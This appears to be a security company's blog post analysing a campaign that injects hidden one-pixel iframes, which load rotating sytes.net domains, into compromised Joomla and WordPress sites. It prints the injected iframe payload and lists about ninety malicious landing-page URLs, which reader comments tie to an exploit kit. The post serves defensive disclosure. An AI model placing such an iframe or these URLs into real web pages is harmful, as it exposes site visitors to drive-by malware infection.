Malware iFrame Campaign from Sytes(.)net

For the last few weeks we have been tracking a large malframe (malicious iframe) campaign that has been injecting iframes from random domains from sytes(.)net into compromised sites.

Malicious iframe injection is nothing new, the bad guys have been using no-ip.org domains for a long time. But what is catching our attention is how often these domains are changing and how short a life-span they have.

This is the payload being added to the compromised sites:

<iframe src="httX:// krbnomrhp.sytes.net:12601 /cart/manuallogin/linktous.php?guardian=82" 
    width=1 height=1 style="visibility: hidden"></iframe>

As you can see, it is a normal iframe injection. But that domain will go offline in approximately 30 minutes and get replaced by a new one. Here is a list we compiled over the past 24 hours:

     40 http://snbkjmv.sytes.net:9101/htbin/clickheat/virus.php?spamnav=82"
     35 http://rvpyhfkjrf.sytes.net:9101/url/uploads/virus.php?spamnav=82"
     34 http://yhmpzoav.sytes.net:9101/mchat/descs/temp_order/punknown.php?power=82"
     30 http://yerepkhayq.sytes.net:9101/vmailadmin/proxy/wp-admin/virus.php?spamnav=82"
     30 http://knkkmprda.sytes.net:9101/dbadmin/virus.php?spamnav=82"
     28 http://nmmmdbhh.sytes.net:12601/mysql/gentoo.php?deals=82"
     27 http://sumghmrs.sytes.net:9101/classes/temp_order/components/virus.php?spamnav=82"
     27 http://lvvfafoylf.sytes.net:9101/srv/virus.php?spamnav=82"
     26 http://rvpyhfkjrf.sytes.net:9101/t/virus.php?spamnav=82"
     26 http://ndcdkba.sytes.net:9101/ip/search/stonemanor/punknown.php?power=82"
     24 http://sgkiipjali.sytes.net:12601/archive/administr8/admin4_colon/gentoo.php?deals=82"
     24 http://nmmmdbhh.sytes.net:12601/phpldapadmin/phpsysinfo/photos/gentoo.php?deals=82"
     24 http://mpuizserdk.sytes.net:9101/skins/virus.php?spamnav=82"
     23 http://zzaisucp.sytes.net:9101/cadmins/adm/options/virus.php?spamnav=82"
     23 http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"
     23 http://vzfxlctk.sytes.net:9101/bitmaps/competition/download/virus.php?spamnav=82"
     23 http://hmbgmijz.sytes.net:9101/video/cgi-perl/tag/outdoors.php?cert=82"
     22 http://xpvcrpf.sytes.net:9101/log_order/punknown.php?power=82"
     22 http://xivzwmojg.sytes.net:9101/admin_includes/config/public/virus.php?spamnav=82"
     22 http://sgkiipjali.sytes.net:12601/roman/gentoo.php?deals=82"
     22 http://knkkmprda.sytes.net:9101/command/virus.php?spamnav=82"
     22 http://kahfcjkg.sytes.net:12601/project/event.php?technical=82"
     22 http://iuxvbhxrp.sytes.net:9101/logo_sysadmin/dev/buy/punknown.php?powe
     22 http://hjzdenbi.sytes.net:9101/cpanel_file/film.php?photos=82"
     21 http://sumghmrs.sytes.net:9101/c0de/virus.php?spamnav=82"
     21 http://irpuxtox.sytes.net:9101/class/bitmaps/virus.php?spamnav=82"
     20 http://vtummjhpb.sytes.net:9101/source/outdoors.php?cert=82"
     20 http://ntygkznp.sytes.net:9101/examples/system-administration/admin_files/outdoors.php?cert=82"
     20 http://nswdmekq.sytes.net:9101/full/sec/virus.php?spamnav=82"
     20 http://ngoydafv.sytes.net:12601/picture_library/htm/gentoo.php?deals=82"
     20 http://mnzzgocsjh.sytes.net:9101/tmp/engine/virus.php?spamnav=82"
     20 http://mnwpkrqbu.sytes.net:12601/admin4_colon/gentoo.php?deals=82"
     20 http://lzrbccmyh.sytes.net:9101/support/outdoors.php?cert=82"
     20 http://knkkmprda.sytes.net:9101/administrators/options/virus.php?spamnav=82"
     20 http://idbosrxgg.sytes.net:9101/session/virus.php?spamnav=82"
     20 http://fgsbmtad.sytes.net:9101/2007/daily/virus.php?spamnav=82"
     20 http://eljbpjfwg.sytes.net:9101/advanced/punknown.php?power=82"
     20 http://dphtmdd.sytes.net:9101/feed/javascript/sql/virus.php?spamnav=82"
     19 http://vxvyvrf.sytes.net:9101/mysql/film.php?photos=82"
     19 http://ukmwzaum.sytes.net:9101/report/tmp/imode/virus.php?spamnav=82"
     19 http://ngoydafv.sytes.net:12601/titles/Lotus_Domino_Admin/maps/gentoo.php?deals=82"
     19 http://fiwailsko.sytes.net:9101/sshadmin/punknown.php?power=82"
     19 http://fgsbmtad.sytes.net:9101/daemon/virus.php?spamnav=82"
     18 http://zwwskaudp.sytes.net:9101/sshadmin/admin1/post/virus.php?spamnav=82"
     18 http://xlsymepe.sytes.net:9101/2003/punknown.php?power=82"
     18 http://ngoydafv.sytes.net:12601/wp-content/nwshp/conf/gentoo.php?deals=82"
     18 http://iljdfdiap.sytes.net:9101/bad/virus.php?spamnav=82"
     18 http://etaggovaql.sytes.net:9101/am/2006/special/punknown.php?power=82"
     18 http://bxluzpbq.sytes.net:9101/profile/wm/feedback/film.php?photos=82"
     17 http://yerepkhayq.sytes.net:9101/finance/virus.php?spamnav=82"
     17 http://vzfxlctk.sytes.net:9101/cpanel_file/zip/virus.php?spamnav=82"
     17 http://ukmwzaum.sytes.net:9101/adm2/virus.php?spamnav=82"
     17 http://mmqozpxrm.sytes.net:9101/haddan_files/punknown.php?power=82"
     17 http://kyicikarpu.sytes.net:9101/results/pm/screens/virus.php?spamnav=82"
     17 http://knhvdmsi.sytes.net:9101/pm/punknown.php?power=82"
     17 http://fowkvsqt.sytes.net:9101/money/admin/virus.php?spamnav=82"
     17 http://fkzsjei.sytes.net:9101/add/virus.php?spamnav=82"
     16 http://zwpcoxs.sytes.net:9101/server_admin_small/elements/film.php?photos=82"
     16 http://vzfxlctk.sytes.net:9101/useradmin/virus.php?spamnav=82"
     16 http://snbkjmv.sytes.net:9101/bbadmin/alterra/virus.php?spamnav=82"
     16 http://ovdqypgi.sytes.net:12601/relax/gentoo.php?deals=82"
     16 http://ovdqypgi.sytes.net:12601/2010/gentoo.php?deals=82"
     15 http://qrzugjjrw.sytes.net:9101/oplata/order/virus.php?spamnav=82"
     15 http://ozqsveikb.sytes.net:9101/avi/virus.php?spamnav=82"
     15 http://nnlwlvq.sytes.net:9101/article/downloads/include/virus.php?spamnav=82"
     15 http://knkkmprda.sytes.net:9101/banneradmin/virus.php?spamnav=82"
     15 http://enwebkwh.sytes.net:9101/product/virus.php?spamnav=82"
     15 http://coqptizgt.sytes.net:9101/data/outdoors.php?cert=82"
     15 http://axfhttqnl.sytes.net:9101/node/virus.php?spamnav=82"
     14 http://xglpjtlpbl.sytes.net:9101/help/outdoors.php?cert=82"
     14 http://xdxmziges.sytes.net:9101/tools/xyza/outdoors.php?cert=82"
     14 http://wwcrkkiu.sytes.net:9101/sshadmin/down/outdoors.php?cert=82"
     14 http://pkpmezztj.sytes.net:9101/beta/sbot/film.php?photos=82"
     14 http://owtppqzjh.sytes.net:9101/internal/proxy/autologin/film.php?photos=82"
     14 http://oggnxbyjwi.sytes.net:9101/backup/e107_handlers/partner/film.php?photos=82"
     14 http://oexwfsnp.sytes.net:9101/php/xfile/directadmin/virus.php?spamnav=82"
     14 http://oexwfsnp.sytes.net:9101/language/ccp14admin/style/virus.php?spamnav=82"
     14 http://nifhevj.sytes.net:9101/cache/sshadmin/inc/outdoors.php?cert=82"
     14 http://mpuizserdk.sytes.net:9101/page/author/misc/virus.php?spamnav=82"
     14 http://mkqydbik.sytes.net:9101/pass/outdoors.php?cert=82"
     14 http://lkgzbafam.sytes.net:9101/installation/outdoors.php?cert=82"
     14 http://lhruanxu.sytes.net:9101/software/virus.php?spamnav=82"
     14 http://kzaefdyx.sytes.net:9101/system/pic/nwshp/punknown.php?power=82"
     14 http://kzaefdyx.sytes.net:9101/admin4_account/punknown.php?power=82"
     14 http://kyicikarpu.sytes.net:9101/commercial/virus.php?spamnav=82"
     14 http://kdkudocdcj.sytes.net:9101/data/content/toolz/punknown.php?power=82"
     14 http://hjzdenbi.sytes.net:9101/ip/extras/null/film.php?photos=82"
     14 http://fiwailsko.sytes.net:9101/mysql_admin/punknown.php?power=82"
     14 http://cdjbdwcnb.sytes.net:9101/sysadmin/money/counters/virus.php?spamnav=82"
     14 http://augtohpklj.sytes.net:9101/plugins/user/house/virus.php?spamnav=82"
     14 http://anxytxwf.sytes.net:9101/addnews/punknown.php?power=82"
     13 http://zrsbhxi.sytes.net:9101/titles/cpanel/themes/virus.php?spamnav=82"
How are the sites getting compromised?

This is a question we often get, but unfortunately, we don’t get access to all the sites that we monitor or that we can query externally. So we can’t really pinpoint the exact source of initial compromise.

However, we do know that most sites with it are either running outdated versions of Joomla or WordPress. So we can speculate what is causing it.

Also remember, while we can’t say how it’s happening, we do know that those on our CloudProxy product have not experienced any issues as we protect from similar attacks.

Scan your website for free:
About Daniel Cid

Daniel B. Cid is the CTO&Founder of Sucuri and the founder of the open source OSSEC HIDS. His interests range from intrusion detection, log analysis (log-based intrusion detection), web-based malware research and secure development.

You can find more about Daniel at his site dcid.me or on Twitter: @danielcid

  • http://www.jugarjugar.net/ Jugar Jugar

    The website it is essential to build a good firewall and security information is inevitable. Recently, malware has invaded from your web server to the user, this really makes us confused to worry about the safety of our lap top and another line

  • http://www.parafriv.net/ Para Friv

    Still do not understand about this content, really thank you for sharing information.

  • Kjetil

    These are all landing pages related to Sweet Orange exploit kit.

  • pyby

    nasty malware, im working on it. It uses EXIF in JPEGS to execute malware!

    check my blog: http://www.vsx.pl/malware-php-iframe-powiazany-z-sytes-net-cookie-dsgfdg34g-htaccess-zmieniony/

  • vtedesco

    If that can help you : I have found the malware code in a joomla website in the file “/libraries/joomla/factory.php” (line 15)